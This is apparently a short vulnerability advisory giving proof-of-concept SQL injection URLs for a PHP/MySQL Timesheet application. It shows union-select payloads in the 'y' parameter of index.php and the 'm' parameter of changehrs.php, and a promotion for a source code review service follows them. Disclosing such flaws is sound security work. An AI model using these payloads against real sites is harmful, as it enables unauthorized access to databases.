PoC/Exploit for Multiple SQL Injection in PHP/MYSQL Timesheet

Published Proof of Concept code - Multiple SQL Injection in PHP/MYSQL Timesheet.

Description
Available
Solution
Not available - check vendor's website

SQL Injection Examples:

http://host/timesheet/index.php?j=composites&m=03&y=1'%20union%20select%201,2,3,4,5/*

http://host/timesheet/changehrs.php?edit=1&m=1'%20union%20select%201,2,3,4,5,'Vulnerable',7/*

Order Source Code Review made by eVuln team

Protect against attacks by source code audit of your site made by our team.The work will be done by experts in website security.

Advisories by vuln type